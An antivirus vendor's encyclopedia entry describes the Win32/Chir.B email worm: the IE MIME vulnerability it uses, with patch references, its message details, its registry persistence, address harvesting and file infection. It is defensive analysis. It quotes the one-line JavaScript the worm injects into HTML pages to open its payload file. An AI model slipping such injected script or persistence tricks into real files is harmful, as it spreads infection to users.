Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Chir.B

I-Worm.Runonce

Win32/Chir.B is a worm spreading as an email file attachment. It has also the ability of a classical virus to attack executable or HTML files.  The worm is 10748 bytes in size.  It attacks computers using the  operating system Windows 9x/ME/NT/2000/XP.

What Win32/Chir.B utilizes to spread via email is an incorrect MIME Header vulnerability in Microsoft Internet Explorer 5.01 and Microsoft Internet Explorer 5.5 allowing the executable file to run automatically without the user double-clicking on the attachment.  The vulnerability description is available at www.microsoft.com/technet/treeview/default.asp?url=/technet/security/ bulletin/MS01-020.asp.  A patch which secures against this vulnerability known from March 2001 is available for download at www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-027.asp.  Since this vulnerability utilizes a selection of known worms to spread it is very important to have the related patch downloaded and installed.

Note: In following text a symbolic inscription %windir% is used instead of the name of directory in which Windows operating system is installed. Of course, this may differ from installation to installation.

The worm arrives in an email attachment as a file named pp.exe.  The message comes from imissyou@btamail.net.cn or addressee_name@yahoo.com. Win32/Chir.B replaces the string addressee_name with the real name of addressee who will receive the copy of the worm.  The subject of the message with the worm is "addressee_name is comming!".  In executing the file the worm is activated and copied into the file %windir%/System/runonxe.exe.  The hidden, system and read-only attributes are set for this new created file.  It ensures the activation of this copy after system rebooting by creation of the item Runonce in the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. It sets its value to "C:\WINDOWS\SYSTEM\runouce.exe".

The worm sends its copies to addresses found in Windows (Windows Address Book) or in files with extensions .wab, .adc, .doc, .xls.  It is also able to get addresses from files with names ending with the string r.db.

Win32/Chir.B infects files with extensions .exe or .src.  However, it will not infect files in folders with names matching the string "wind*" or "winnt*".  It searches for files with extension .htm or .html also on both local and network drives.  Then it adds into such files the following code:

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>

This line opens the file readme.eml 14336 bytes in size created by the worm in the directory with infected HTML file.

© 1992-2004 Eset s.r.o. All rights reserved. No part of this encyclopedia may be reproduced, transmitted or used in any other way in any other form or by any means without prior permission from Eset.